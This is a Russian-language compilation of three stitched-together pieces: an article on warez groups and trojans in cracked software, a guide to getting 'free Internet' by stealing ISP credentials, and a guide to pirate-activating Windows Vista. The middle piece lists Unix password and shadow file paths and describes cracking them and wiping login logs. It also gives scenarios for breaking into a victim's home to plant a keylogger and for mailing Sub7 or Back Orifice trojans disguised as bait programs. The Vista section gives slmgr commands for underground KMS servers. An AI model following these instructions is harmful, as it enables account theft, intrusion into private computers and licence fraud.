Конечно же, время шло, совершенствовались технологии, и индивидуальные распространители ворованного софта стали объединяться в группы, получившие название релизных. С борцами за открытое программное обеспечение их роднит два главных идейных постулата: требование бесплатности и глобальные амбиции. Это означает, что, в большинстве своем, программы «ломают» не для того, чтобы получить деньги от пользователей, продавая им средства продления лицензии (это называется не «warez», а «мошенничество»), а для собственного самоудовлетворения (желания прославиться). Глобальные амбиции заключаются в том, что программу выкладывают не на одном сайте или файловом сервере, а распространяют всеми возможными средствами— с FTP-серверов они попадают в IRC-каналы, P2P-сети (BitTorrent, например) сначала глобального, а потом и локального географического масштаба (например, домовые локальные сети). Таким образом получается, что отследить точно откуда в Сети появилась та или иная версия взломанного софта, если только релизная группа не заявит об этом громко, нереально.

Виды и типы «warez»

Самым главным и широкораспространенным видом «warez» являются программы. Так как бесплатные программы (freeware) часто распространяются по принципу «как есть», то есть всю полноту ответственности за свой компьютер после установки программы несет пользователь, то ломать такое программное обеспечение не имеет смысла. По той же причине, открытый софт также не представляет особого интереса — наоборот, если такие программы видоизменить (по делу) и растиражировать на всевозможных носителях, «залить» на все файловообменные сервера, а также в каждом форуме или доске объявлений «наследить» об этом, то разработчики, скорее всего, поблагодарят, а не подадут в суд. Другое дело — коммерческий софт. Видов платных программ (shareware) существует великое множество, причем существуют как классические «shareware» программы (то есть функциональность программы разительно увеличивается, когда разработчик получит от вас символическую сумму (обычно до 60 долларов) за приобретение лицензии), так и откровенно «дорогущие» программы стоимостью по 250-300 долларов, которые откажутся работать, если не будет получена лицензия.
Shareware программы бывают следующих типов:

Trialware (от слова «trial» — проба) — у программы есть пробный период, в течение которого программа выполняет 100% своих функций, но периодически может напоминать о том, что до его окончания ее надо приобрести. Когда триальный период заканчивается, программу придется либо купить, либо удалить с компьютера.

Comfortware (от слова «comfort» — удобство) — разновидность trialware, в интерфейсе которых внедрены NAG-экраны (просмотр рекламы от разработчика прежде чем загрузится сама программа, периодические напоминания о том, что программа работает в деморежиме).

Crippleware (от слова «cripple» — калека) — программа с урезанным функционалом (термин малоупотребляемый).

Обычно с shareware программами поступают следующим образом: в программном коде находится (через отладчик) фрагмент, отвечающий за регистрацию (если речь идет о вводе серийного номера) и/или за соединение с Интернет (если для проверки валидности кода используется удаленный сервер). Потом создается специальный алгоритм, рассчитывающий комбинацию кода, а если используется сетевое соединение, то оно просто запрещается на программном уровне. Соответственно, в комплекте с установочным файлом поставляется дополнительная программа, либо выдающая необходимую комбинацию символов для регистрации (она называется «keygen» — генератор ключей), либо изменяющая файлы самой программы (соответственно, она называется «crack» и часто либо не переводится на русский язык, либо переводится как «лекарство»). В последнее время в ходу другой вид распространения «warez»-продукции — добавление в архив дистрибутива программы файла с регистрацией (это либо текстовый документ с регистрационной информацией, либо файлы с расширениями .*reg или .*nfo). «Классическим» признаком нелегального распространения софта является наличие в архиве файла *.nfo, в котором записывается контрольная сумма установочного дистрибутива программы, на которую сделан «патч», «лекарство», «crack», «генератор ключей», его версия и данные об участнике релизной группы или обо всей группе в целом. Сами данные вписаны в составленное из ASCII-символов фирменное изображение (там же можно встретить и фирменные высказывания на тему «если Вам понравилась программа, то не используйте этот crack, patch, keygen, а купите ее»).

К другим видам «warez» относят:

    * «рипы» (специально закодированные аудио- и видеофрагменты, например, записи телесериалов или аудиопродукцию),
    * дистрибутивы игр (в них обычно снята защита от копирования, произведены некоторые модификации, и запуск самого приложения игры осуществляется «без диска»),
    * «рипы» (специально закодированные аудио- и видеофрагменты, например, записи телесериалов или аудиопродукцию),
    * электронные версии книг,
    * дистрибутивы игр (в них обычно снята защита от копирования, произведены некоторые модификации, и запуск самого приложения игры осуществляется «без диска»),
    * скрипты (традиционно, это системы управления контентом сайта, в народе называемые «движками», а также некоторые программные компоненты, например, модуль Интернет-магазина, требующие в нормальных условиях покупки лицензии).

«Рыбные места»

Как правило, при поиске в Интернете, сайты, занимающиеся распространением «warez» выходят на первой-второй странице выдачи результатов по причине того, что их администраторы в описание практически всех страниц своего ресурса вводят ключевые слова самых популярных программ. Обычно такой сайт представляет портал, на главной странице которого публикуются так называемые «новости» в «обрамлении» большого числа рекламных модулей довольно специфического содержания (услуги по взлому почтовых ящиков, предложения об интимных услугах, просмотр эротических и порнографических материалов, в некоторых случаях, реклама «финансовых пирамид» и Интернет-казино и тому подобное) или закрытый для доступа незарегистрированным пользователям форум, в котором для просмотра информации о загруженном файле требуется выполнить какие-либо условия (написать определенное число сообщений, загрузить свой файл, поблагодарить участников конференции, подождать определенного срока для активации учетной записи и так далее). В тексте такой новости ставится ссылка на скачивание искомого файла, который очень часто находится не на сервере самого портала, а на файловообменном ресурсе. Этот «хитрый» прием позволяет избежать проблем владельцу такого сайта, так как у файловообменников есть достаточно жесткие правила по хранению там дистрибутивов: ограничено время, размер файла, а также доступ к скачиванию (то есть, администратор «warez-портала» снимает с себя ответственность за загрузку файла, ему не надо опасаться перегрузки своего сервера и платить за дополнительного дисковое пространство).
Основным популярными среди пользователей из России и стран ближнего зарубежья файловообменными ресурсами являются:

rapidshare.de/com
megaupload.com
ifolder.ru
depositfiles.com

Выбор зарубежных серверов обусловлен, во-первых, сравнительно более «продвинутым» техническим оснащением самого сервиса, а во-вторых, желанием запутать следы. Но если дата-центры файловообменника находятся территориально близко к пользователю, скачивающему оттуда файлы, то скорость загрузки может быть выше, о чем свидетельствуют призывы пользователей, комментирующих «новости» на warez-сайтах «залить туда-то и туда-то».

Бесплатный сыр

Люди, занимающиеся взломом программного обеспечения в своем подавляющем большинстве, голые энтузиасты, которые получают деньги не от владельцев warez-порталов, а по месту своей основной работы программистами. Но в получении денег заинтересованы, прежде всего, как раз администраторы сайтов, на которых и распространяются эти «продукты». Обычно легально заработать деньги на одной только рекламе у сайта с явно сомнительным контентом весьма сложно, но можно, если проводить грамотную маркетинговую политику. Но большинство владельцев таких ресурсов просто не понимают, что значат три последних слова из предыдущего предложения, поэтому деньги им нужны «здесь и сейчас». Как результат, им надо заниматься продажей на сайте каких-либо товаров и услуг, которые не могут быть в прямом смысле этого слова названы «warez». Обычно продают номера ICQ, требуют вознаграждения за украденные e-mail адреса, а также просто крадут аккаунты в платежных системах и Интернет-казино. Конечно, получить их можно только от самих пользователей, которые заходят на warez-портал. Поэтому администраторы таких сайтов или их доверенные лица занимаются кодингом (вирусописательством), в результате чего на компьютер жертвы (то есть посетителя warez-сайта) внедряются трояны, передающие его личную информацию: пароли и логины, адреса посещенных сайтов (например, платежной системы или личного FTP-сервера), номера кредитных карт и так далее. В качестве «классики жанра» выступает всемирно известный троян Pinch (от английского слова — «пиявка»). Он очень хорошо модифицируется, и внедряется в исполняемые файлы (сценарии, инсталляторы, генераторы ключей, скринсейверы) и при грамотном подходе к его маскировке очень плохо обнаруживается большинством антивирусных продуктов. Как считают эксперты по сетевой безопасности из компаний Agnitum и Лаборатории Касперского, скомпилировать троян Pinch и с помощью программ крипторов или экзотических упаковщиков сделать его труднодоступным для проверки модулю антивируса, который не может «знать» все возможные упаковщики, не составит особого труда. Плюс еще к шифрованию можно добавить некоторые антиотладочные приемы и тогда могут стать бессильны и те средства антивирусной защиты, которые при проверке файла пытаются создать эмуляцию программной среды, в которой будет запущен исполняемый файл.
# Для того, чтобы обезопасить себя от «непрошенных гостей» в виде троянов, червей и рекламного контента, всплывающего в браузере, пользователям, решившимся все-таки использовать warez-продукцию следует: не пользоваться архивами, защищенными паролем — именно наличие пароля на архив является одним из признаков, что в дистрибутив может быть включен в зашифрованном виде троян;
# не скачивать разнообразные программы «для увеличения скорости скачивания с сайта в десятки раз» — это программное обеспечение в лучшем случае внедрит на компьютер рекламные модули, в худшем — тот же самый Pinch;
# не разрешать ActiveX компоненты и исполнение скриптов с такого рода сайтов, если Вы не уверены, что это безопасно и целесообразно.

Но определенные методы защиты от такого рода угроз все-таки существуют. Пользователю стоит обращать внимание на поведение программы (запросы на добавление ее в автозагрузку системы, копирование себя в системные каталоги) — именно так работает проактивная защита Антивируса Касперского, предназначенная все-таки для обычных пользователей (она работает в «тихом режиме»). Для продвинутых же пользователей защита Outpost Firewall/Outpost Security Suite по умолчанию предлагает выбор действий. Разумеется, антивирусная защита всегда должна быть адекватной времени — так в шестой версии Антивируса Касперского и в старых версиях Outpost Firewall трояны «умудрялись» нажимать за пользователя на кнопку «Allow» и тем самым внедряли себя в систему. Многие же другие известные антивирусные продукты, не обладающие развитыми проактивными технологиями, в такой ситуации оставляют действия подобных вредоносных программ безнаказанными.

Дура лекс, Или закон, что дышло

В российском законодательстве, равно как и русском языке слова «варез» нет, именно поэтому во всей статье это слово писалось по-английски. Равно как и нет правового статуса понятиям, входящим в виды «warez» (crack, keygen, patch, serial). Так как понятие «warez» нарушает авторские права разработчика программного обеспечения и/или компании-владельца этого программного обеспечения, то по идее его регулировать должен закон о защите авторских и смежных прав. Кроме того, в России есть еще и закон о правовой охране программ для электронных вычислительных машин и баз данных (в ред. Федеральных законов от 24.12.2002 N 177-ФЗ, от 02.11.2004 N 127-ФЗ, от 02.02.2006 N 19-ФЗ).

В главе 3 «Использование программ для ЭВМ и баз данных» утверждается, что «лицо, правомерно владеющее экземпляром программы для ЭВМ, вправе без согласия правообладателя и без выплаты дополнительного вознаграждения декомпилировать или поручать декомпилирование программы для ЭВМ с тем, чтобы изучать кодирование и структуру этой программы при следующих условиях:

    * информация, необходимая для взаимодействия независимо разработанной данным лицом программы для ЭВМ с другими программами, недоступна из других источников;
    * информация, полученная в результате этого декомпилирования, может использоваться лишь для организации взаимодействия независимо разработанной данным лицом программы для ЭВМ с другими программами, а не для составления новой программы для ЭВМ, по своему виду существенно схожей с декомпилируемой программой для ЭВМ или для осуществления любого другого действия, нарушающего авторское право;
    * декомпилирование осуществляется в отношении только тех частей программы для ЭВМ, которые необходимы для организации такого взаимодействия» (статья 15).

Но проблема контролирования распространения warez в Интернете, а также санкционирования уголовных дел (за нарушение авторских прав) по-прежнему является одной из самых актуальных. Конечно же, можно просто сетовать на то, что у прокуратуры не дошли руки до владельцев таких ресурсов, да и сами компании-разработчики софта (в особенности, если речь идет о зарубежных вендорах) не могут в силу различных обстоятельств подать заявление на возбуждение уголовного дела по преследованию распространителей warez. Но рано или поздно, этот процесс будет запущен и в России, однако, как говорил Салтыков-Щедрин «суровость законов российских смягчается необязательностью их исполнения»

Заключение

Эта статья была написана не с целью пропаганды warez, а в образовательных целых, не преследующих рекламу или одобрение пиратства. Проблема распространения warez, прежду всего, этическая — ведь по статистике большинству администраторов warez-порталов нет еще и 18 лет, но в их сознании уже четко укрепилась установка, что закон можно переступить и возмездие за это может и не прийти. Кроме того, русские разработчики софта еще не могут организовать адекватную проверку легальности дистрибуции программного обеспечения и выиграть иск в суде, как это делают за границей их зарубежные коллеги. В России на сегодняшний день гораздо проще полюбовно договориться с администрацией крупного warez-портала о том, что та или иная компания-разработчик попадет в «белый список», и ее не будут ломать, чем тратить время и деньги на создание судебного прецедента с привлечением печально известных российских законов.


Бесплатный Интернет
Ответ: Сначала чётко разберёмся, что мы понимаем под термином "взломать Инет или провайдера": получить Login и Password, введя которые в окне терминала мы сможем лазить в Инете за чужой счёт. Получить их действительно можно. Но все данные ссылки обычно ведут к страницам, где предлагается скачать прогу, якобы взламывающую провайдера. Все подобные проги - трояны. Они даже иногда находят корректные Логин и Пароль (Ваши) и отсылают их мылом (или по Асе) "Хозяину". Таких троянов существует множество. Это - всего-лишь одна из разновидностей, отличающаяся большим процентом "попадания": в инструкции описан полный набор действий "для взлома провайдера", жертва всё делает, и, в результате оказывается "на крючке". Вопрос: "Так всё-таки, как мне бесплатно лазить в интернете?" Ответ: Существует достаточно много способов похитить пароли. Я разделил всё это на две категории:

Похищение с сервера
Похищение у юзера
Похищение с сервера:

В результате удачного "взлома" сервера получаем зашифрованный файл с паролями, а затем расшифровываем его и получаем необходимые нам пароли. Обычно провайдеры используют UNIX сервера, в которых файл с паролями хранится в папке etc под именем passwd (/etc/passwd). Естественно, пароли - зашифрованы, а программы дешифрации - не существует :-(. Но не спеши обламываться, есть способ узнать пароль: алгоритм шифрования известен. Прога John the Ripper (скока у них Джонов?) берёт пароль, шифрует его и сравнивает с тем, что написано в файле. Если совпадает - ура!, если нет - берёт следующий. Так при мощном компе за несколько суток можно получить несколько паролей (логины не шифруются. Итак, главное - достать этот файл, а дальше - дело техники.

На любом UNIX'е пароли хранится в файле /etc/passwd но очень часто (не у всех провайдеров админы - лохи) в этом файле пишут что-то наподобие *, а настоящие пароли хранятся в другом месте. Поискать можно в следующих местах:

/etc/security/passwd
/tcb/auth/files//
/tcb/files/auth/?/
/etc/master.passwd
/etc/shadpw
/etc/shadow
/etc/tcb/aa/user/
/.secure/etc/passwd
/etc/passwd[.dir|.pag]
/etc/security/passwd.adjunct
##username
/etc/shadow
/etc/security/* database
/etc/auth[.dir|.pag]
/etc/udb

Результат не гарантирован, но шансы есть. В крайнем случае воспользуйтесь прграммой getpwent (), которая отлавливает файл с паролями на наиболее мудрёных серверах.

Итак, у тебя уже есть файл с паролями, и ты, естественно, не знаешь, что с ним делать. Суй его в лапы John'у (который the Ripper) и наслаждайся Инетом (через неделю примерно). Естественно, нужно замести следы. Следы - это файлы /etc/utmp, /usr/adm/wtmp и /usr/adm/lastlog. Редактируй их с помощью специальной утилиты.

Недостаток этого способа в том, что многи провайдеры ставят у себя систему с мудрёным названием NIS(Network Information Server)/YP (Yelow Pages). Тогда вместо пароля пищется что-то типа +::0:0::: Если случилось подобное несчастье, поищи другого провайдера (или переходи ко второму способу). К этому вернёшься годика через два. Окрепший, с кучей новых прог и утилит, Супер Хакер, герой своего народа.

Похищение у юзера:

Можно похитить пароль непосредственно у юзера (с его компа или при вводе самим юзером). В результате удачного "похищения" получаем один пароль. Тут, естественно не обойтись без специальных прог. Далее привожу несколько сценариев возможных действий.

Саботаж

Проникаешь на хату к юзеру и получаешь доступ к его компьютеру.
Ищешь в директории виндов по следующей маске: *.pwl
Если чё нашел - копируй на дискету.
Смотришь свойства удалённых соединений.
Если там задействован сценарий - смотри путь к нему, хапай файл на дискету и беги с его хаты поскорей.
Если ты схапал pwl'шник - скачивай PWLHack (или что подобное), суй ей в зубы свою находку и жди. Потом получишь кучу паролей. Правильный найдёшь методом "научного тыка".
Если не удались пункты 2-5 устанавливай юзеру какую-нибудь прогу, просекающую появление окна терминала и хапающую нажатия клавиш (можно также записать все нажатия за день, а потом рыться в логе)
На следующий день приходи, снимай прогу, копируй файл лога на дискету и дуй оттуда.
* П. 7 можно выполнять не на слудующий день, а через некоторое время, убедившись в том, что юзер соединялся с Инетом (напр. говоришь: "Проверь почту!")

Болтун - находка для шпиона

Меня многие упрекают в невозможности осуществления данного метода, но, поверьте мне, есть и такие лохи-юзеры, как описано в сценарии.

Проникаешь на хату к юзеру и получаешь доступ к его компьютеру.
Ставишь прогу, срабатывающую где-то через неделю, которая вызывает частые зависания компьютера, причём явно "связанные с интернетом" (напр. комп зависае при открытии окна терминала).
Входишь к нему доверие с тем, чтобы он позвал тебя для устранения "зависаний".
Приходишь к нему, расспрашиваешь про проблемы. Проверяешь всё и убеждаешься в "конкретных проблемах". Говоришь: "Чтобы всё исправить необходим логин и пароль интернета".
Удаляешь прогу и получаешь "гонорар" (кстати, подобное можно делать только ради этого).
*Юзер должен быль полным чайником. Можно также вместо п.4 перейти к п. 6 предыдущего сценария.

Камуфляж

Этот сценарий работает в том случае, если вы не можете получить доступ к компу жертвы, но знаете его e-mail хотя-бы.

Скачиваешь прогу Sub7, Net Bus или Back Orifice. (в дальнейшем - троян)
Пишешь прогу-приманку* На неё ты будешь ловить юзера.
"Склеиваешь" специальной прогой сервер трояна с приманкой.
Мылом например отсылаешь письмо с вложенным в него трояном, а в письме расхваливаешь прогу-приманку так, чтобы юзер обязательно запустил exe'шник. (Я думаю, ты не будешь посылать это письмо с провайдерского адреса, а пошлёшь его с какого-нибудь левого сервака, на котором создан твой аккаунт, в котором нет ни малейшего намёка на информацию о тебе).
Сервер трояна присылает тебе IP жертвы. Сидишь и караулишь жертву в Инете. Как только обнаружишь его, закачиваешь ему прогу, следящую за нажатиями клавишь и запускаешь её.
На следующий/через день опять караулишь юзера. Скачиваешь лог, в котором ищешь Логин И Пароль. Ура!!!
(Необязательно) Мучаешь юзера всякими приколами из троянского арсенала (окна с ошибками, принтер печатает всякую чухню, сидюк открывается и т. п.)
*Прога-приманка пишется для того, чтобы юзер запустил прогу-троян, "склеенную" с ней. Её расхваливают как могут, например:

Патч для Quake 8.
Обновление Quake до восьмой версии.
Обновление ICQ до 21 версии.
Ускорение Инета в 10 раз.
Ищет и уничтожает CIH (вирус).
Свой вариант.
Приманка делает что-нибудь из следующего списка:

Мессадж-бокс с сообщением (типа "mfc50.dll not found. Programm now well terminated.") - самое простое.
Показывает порно-картинки (можно также вставить ещё одну в тело сообщения).
Проверяет на вирус (какой-то, который не может обнаружить не один коммерческий антивирус.)
Пишет красивым шрифтом (с эффектами какими-то) какой-то текст (напр. поздравляет с Новым Годом).
Свой вариант (если фантазией не обделён).
Что делать дальше?

Итак, если ты всё сделал правильно, ты имеешь Логин и Пароль для входа в Инет за чужой счет. Если ты "хакнул" сервер, у тебя их с десяток-два (три и больше). Если "похитил" у юзера - один. Этого явно не достаточно. Хакни ещё хотя-бы трёх-четырёх (чем больше, тем лучше). Вопрос: "Зачем ещё, у меня есть один, мне хватит!?.). Ответ:

Как ты думаешь, хакеров ловят или нет (угадай с двух попыток)? Правильный ответ - да. Как? А очень просто (применительно только к нашему случаю):

При работе в Инет, обладатель "хакнутого" аккаунта получает счёт за очень большое количество часов. Он сообщает провайдеру: "Эй ты, пень паганый, я работаю в месяц только 15 часов, а плачу за 152". Провайдер просекает фишку, и начинается "охота". Тут уж тебе не с добровать. Конечно, скорее всего, провайдер просто поменяет пароль.
Ты сидишь в Инете. В это время юзер лезет в Инет, чтобы отправить письмо маме в Сибирь. Ему сообщение (в переводе на русский): "Иди отсюда, тут уже один перец сидит". Юзер всё рассказывает провайдеру и тот меняет пароль (в лучшем случае).
Юзер сидит в Инете. Ты коннектишься, получаешь сообщение. Провайдер его видит в логе, просекает фишку и ...
Вопрос: "Во блин, а шо ж делать?". Ответ:

Стараться сидеть поночам. В это время ламера спят.
Подключаться каждый раз по другому Логину (напиши прогу, которая, например, будет случайным образом заменять файл сценария.)
Стараться Хакать юзеров с неограниченным доступом - ему пофигу наработанные часы. (впрочем, тут есть другая сторона медали: он больше сидит в Инете, следовательно, ты будешь долго ждать, пока он набазарится в своём дурацком чате.



Как активировать Висту ( Windows Vista )

Лидеры рынка программного обеспечения прекрасно осведомлены о том, что любые защитные механизмы (даже самые невинные и неназойливые) отрицательно сказываются на динамике продаж, поскольку пиратов никакая защита все равно не остановит, а вот у честных пользователей возникают серьезные проблемы, в результате чего они либо уходят к конкурентам, либо обращаются за помощью к хакерам.

Вплоть до появления Windows 2000, компания Microsoft ограничивалась однократной проверкой серийного номера на этапе инсталляции системы, что позволяло пользователям (и пиратам) тиражировать один легально купленный диск в неограниченном количестве. Для оценки масштабов пиратства Microsoft выпустила специальную утилиту, проверяющую подлинность установленной копии Windows, назойливо предлагая пользователям почекаться при скачке обновлений. Первое время проверка была необязательна и обновления отдавались и так. Но затем Microsoft ужесточила политику, оставив в свободной раздаче лишь критические заплатки, и Service Pack 4 стал отдаваться только после проверки подлинности. Потому многим пользователям, использующим пиратские версии, пришлось качать обновления с варезных сайтов.

В XP проверка подлинности стала обязательной, и даже легально купленная система требует активации (осуществляемой через интернет или голосовой телефон), без которой переходит в режим ограниченной функциональности. К счастью, корпоративная версия (не предназначенная для розничной продажи) работает и без этого «чуда», и проверка подлинности осуществляется лишь при установке обновлений. Причем критические обновления по-прежнему можно скачивать без всяких проверок.

В Висте требуется активировать все версии (в том числе и Enterprise – бывший Corporative Edition), причем при смене железа активацию необходимо осуществлять вновь. Microsoft оставляет за собой право отказать в выдаче нового ключа без объяснения причин. Добавь сюда еще ложные срабатывания защиты (которые случаются достаточно часто) и ответь мне на вопрос: ты все еще надеешься обойтись без хакерских приемов?
Система активации снаружи и изнутри

За проверку подлинности Висты отвечает компонент WGA (Windows Genuine Advantage), ранее реализованный в Microsoft Office, где он назывался Office Genuine Advantage (или OGA). WGA привязывается к железу, генерируя специальный серийный номер, отправляемый на сервер проверки подлинности и возвращающий пользователю ключ активации, который необходимо ввести в течение 30 дней с момента установки системы. В противном случае Виста перейдет в так называемый режим ограниченной функциональности (reduced functionality mode, или RFM). В этом режиме нет главного меню, значков рабочего стола, а заставка рабочего стола замещена черным фоном. Но хуже всего то, что через час работы система завершает текущий сеанс без всякого предупреждения!

Ключ активации генерируется на основании приведенных ниже данных и автоматически аннулируется при их изменении (включая даже такую невинную операцию, как обновление прошивки BIOS), требуя повторной активации:

product key и product ID

контрольная сумма BIOS

вендор/версия/дата BIOS

MAC-адрес сетевой карты

версия операционной системы

серийный номер жесткого диска

языковые профили операционной системы

Естественно, подобный подход неприемлем для крупных компаний и корпораций, поскольку он ставит их в прямую зависимость от Microsoft, и потому последней пришлось пойти на уступки, включив поддержку многопользовательских ключей активации (они же Multiple Activation Keys, или MAK), впервые реализованных в пакетах MSDN Universal и Microsoft Action Pack.

Каждый MAK-ключ может активировать определенное количество компьютеров заданное число раз (основанное на типе соглашения между потребителем и компанией Microsoft). При исчерпании активаций потребитель может бесплатно возобновить MAK-ключ, позвонив в местный центр обработки активаций. MAK-ключи можно использовать для активации любой многопользовательской версии Висты (не стоит путать MAK-ключи с ключами установки, MAK-ключи — это ключи активации).

При выполнении MAK-активации клиентский компьютер генерирует идентификатор установки (ID) и передает его серверу активации Microsoft по интернету или «вручную» через голосовой телефон. При успешном завершении операции сервер возвращает MAK-ключ и идентификатор подтверждения (CID). MAK-ключи хранятся в незашифрованных XML-файлах, копируемых на компьютер в процессе автоматической установки в папку %systemroot%\panther, но в конце установки подлинное значение параметра ProductKey удаляется и заменяется строкой «SENSITIVE*DATA*DELETED» («конфиденциальные данные удалены»). Это сделано для того, чтобы пользователи не могли влиять на этот ключ и чтобы они не могли получить его после того, как он был установлен на компьютер. Поэтому, чтобы получить MAK-ключ, необходимо иметь оригинальный инсталляционный диск, которым можно пользоваться не только на работе, но и дома. В принципе, имея знакомых в IT-сфере, выпросить валидный ключ не проблема. После этого его останется установить по методике, описанной во врезке «Активация Висты с помощью MAK-ключа».

Служба управления ключами Key Management Service (KMS) позволяет выполнять самостоятельную активацию компьютеров в локальной сети без обращения к серверам компании Microsoft. KMS-службу можно задействовать на любом компьютере под управлением Висты или Server Longhorn, установив KMS-ключ и затем активировав этот компьютер через сервер компании Microsoft. В отличие от MAK-ключей, KMS-ключи устанавливаются только на компьютеры, управляющие KMS-службой, но никогда — на активируемые ими компьютеры!

Версии Висты, предназначенные для розничной продажи, не могут быть активированы через KMS-службу, что, впрочем, не является камнем преткновения, поскольку найти корпоративную версию можно в любом киоске, в Осле или варезном сервере. Предоставление прав на корпоративную версию Висты предполагает наличие корпоративной лицензии на предыдущую операционную систему. По умолчанию носители с 32-разрядными корпоративными версиями Висты предназначены только для обновления и не являются загрузочными, поэтому сначала необходимо установить предыдущую версию Windows, а затем поверх нее водрузить Висту (кстати говоря, загрузочные носители также можно получить по запросу через портал корпоративных лицензий). Носители с 64-разрядными версиями не имеют подобных ограничений, однако пользоваться ими, в силу отвратительной обратной совместимости, категорически не рекомендуется.

По умолчанию ключи, выдаваемые службой KMS, ограничиваются шестью компьютерами, каждому из которых дается до девяти повторных активаций, однако при необходимости Microsoft может предоставить специальные KMS-ключи, рассчитанные на заданное количество активаций. Впрочем, если покурить хорошей травы, то можно обойтись и без помощи Microsoft. Достаточно, например, установить систему на виртуальную машину, получить KMS-ключ и снять образ, используя его столько раз, сколько компьютеров необходимо активировать.

Осознавая слабость KMS-ключей, Microsoft ужесточила правила KMS-активации. Прежде всего, KMS-сервер начинает раздавать CID'ы только после того, как получает по меньшей мере 25 запросов на активацию от разных машин. Microsoft прямо так и пишет: «Использование службы KMS предназначено для управляемых сред, в которых к сети организации постоянно подключено более 25 компьютеров. Клиентские компьютеры используют информацию, полученную на сервере службы KMS, для самостоятельной активации. К серверу службы KMS должно быть подключено не менее 25 физических клиентских компьютеров под управлением системы Windows Vista, прежде чем какой-либо из этих компьютеров сможет пройти активацию. Это число называется значением n или счетчиком n. Компьютеры, работающие в средах виртуальных машин (VM), также могут активироваться с помощью службы KMS, но они не включаются в число активированных систем». Как обеспечить подключение 25 узлов в рамках домашней локальной сети? Ну это даже не вопрос! Ставим виртуальную машину на 24 компьютерах, на каждый из них водружаем Висту, забрасываем образ KMS-сервера и отправляем запрос на активацию, после чего перетаскиваем образ KMS-сервера на свою основную систему и отправляем 25-й запрос. Все! Сервер считает, что к нему подключено 25 узлов и активирует нас, словно родную маму.

В отличие от MAK-активации (которую достаточно выполнить всего один раз), KMS-активацию необходимо повторять каждые 180 дней, по прошествии которых она аннулируется и система переходит в 30-дневный триальный режим. А когда он закончится — в режим ограниченной функциональности до момента подключения к KMS-серверу или MAK-активации, что, по замыслу Microsoft'а, предотвращает использование компьютеров в течение неопределенного срока без наличия соответствующей лицензии после их изъятия из организации. По умолчанию неактивированные клиенты пытаются подключиться к KMS-серверу каждые 2 часа (это значение является настраиваемым), а после прохождения активации — каждые 7 дней (это значение также является настраиваемым) и в случае успешного завершения операции обновляют 180-дневный счетчик дней, оставшихся до истечения срока активации. Если активизацию по каким-то причинам выполнить не удалось, система продолжит долбить сервер, предпринимая настойчивые попытки повторной активации, отключить которые можно путем изменения значения параметра реестра HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SL\Activation\Manual на единицу.

Причиной провала активации зачастую становится недемократично настроенный брандмауэр. Для KMS-активации Виста использует анонимный RPC-протокол поверх TCP, стучащийся в порт 1688 (впрочем, номер порта не является жестко заданным и при желании может быть изменен). Клиентский компьютер устанавливает TCP-соединение с KMS-сервером и передает один пакет запроса. KMS-сервер отвечает и закрывает сеанс. Как при запросе активации, так и при запросе обновления используется один и тот же тип передачи запроса и получения ответа, суммарная длина которого составляет 450 байт. Запросы и ответы регистрируются клиентом в журнале событий приложений (события компонента Microsoft Windows Security Licensing SLC 12288 и 12289 соответственно). KMS-сервер регистрирует запросы клиентских компьютеров в событиях компонента Microsoft-Windows-Security-Licensing-SLC 12290.
Установка и активация Висты

Таким образом, для миграции на Висту нам необходимо иметь загрузочный DVD-образ Windows Vista Business/Enterprise Edition, который можно добыть в Осле или скачать с www.ru-board.com. В Enterprise-версии ключ продукта (Product Key, он же серийный номер) уже зашит внутри pid.txt, и потому вводить его при установке не требуется. Активировать Висту можно на любом подпольном KMS-сервере, их адреса публикуются на хакерских форумах (смотри врезку). Для этого необходимо запустить консоль с правами администратора, воспользовавшись службой RunAs (или, завершив текущий сеанс, войти в систему под администратором), после чего набрать следующие команды:

$cscript \windows\system32\slmgr.vbs -skms IP_адрес_KMS_сервера:порт

$cscript \windows\system32\slmgr.vbs -ato

Для проверки успешности активации можно воспользоваться ключом ‘-dli’, переданным все тому же скрипту slmgr.vbs:

$cscript \windows\system32\slmgr.vbs -dlv

Версия службы лицензирования программного обеспечения: 6.0.5384.4

ActivationID: 14478aca-ea15-4958-ac34-359281101c99

ApplicationID: 55c92734-d682-4d71-983e-d6ec3f16059f

Расширенный PID: 11111-00140-009-000002-03-1033-5384.0000-1942006

Установочный ID: 000963843315259493598506854253663081409973656140419231

Узнать, сколько дней осталось до повторной KMS-активации поможет ключ ‘-dli’, выдающий подробную информацию по регистрации (для вывода более детальной информации о лицензировании используй ключ ‘-dlv all’):

$cscript \windows\system32\slmgr.vbs -dli

Имя: Windows™ Vista, Enterprise edition

Описание: Windows Operating System - Vista, ENVIRONMENT channel

Частичный ключ продукта: RHXCM

Состояние лицензирования: Лицензированное

Истечение срока действия корпоративной активации: 43162 минут (29 дней)

Окончание ознакомительного периода: 29.08.2007 16:59:59

Client Machine ID (CMID): 45d450a8-2bef-4f04-9271-6104516a1b60

Автоматическое обнаружение с помощью DNS: Имя сервера KMS не доступно с помощью DNS

Расширенный PID сервера KMS: 11111-00140-008-805425-03-1033-5384.0000-1752006

Интервал активации: 120 минут

Интервал обновления активации: 10080 минут

Если slmgr.vbs возвращает код ошибки (записанный в шестнадцатеричной нотации), определить соответствующее ему текстовое сообщение можно с помощью утилиты slui.exe, запущенной из командной строки следующим образом: slui.exe 0x2a 0x<код ошибки>, например:

$slui.exe 0x2a 0x8007267C

Для локальной системы не настроено ни одного DNS-сервера.

Ключи активации, сгенерированные подпольным KMS-сервером, хорошо подходят для локальной регистрации системы, но палятся при установке обновлений, которые Виста загружает автоматически. И чтобы не нарваться на неприятности, службу Windows Anytime Upgrade следует отключить, скачивая критические обновления безопасности вручную (они не требуют проверки подлинности).

Открываем редактор реестра, заходив в HKLM\Software\Microsoft\Windows \CurrentVersion\Policies, создаем там раздел \Explorer\WAU (в результате чего полная ветвь будет выглядеть так: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\WAU), переходим к \WAU и создает там ключ «Disabled» типа DWORD, установленный в значение «1». Все! Теперь служба автоматических обновлений отдыхает!

Как вариант - активировать систему можно с помощью образа уже активированного KMS-сервера, который ты либо найдешь на самом DVD-диске известного происхождения, либо скачаешь с www.ru-borad.com. Достоинство этого решения в том, что образ, устанавливаемый на виртуальную машину (которой обычно является VMWare), не требует наличия выхода в интернет и вообще не зависит ни от чьей воли (подпольные KMS-серверы могут закрыться в любой момент, ищи их потом). А недостаток — необходимость устанавливать VMWare, представляющую собой коммерческий продукт весом в полгектара. И хотя существует бесплатный «проигрыватель» образов VMWare Player, с ним приходится изрядно попотеть, прежде чем KMS-сервер увидит виртуальный сетевой адаптер, связывающий его с основной операционной системой.

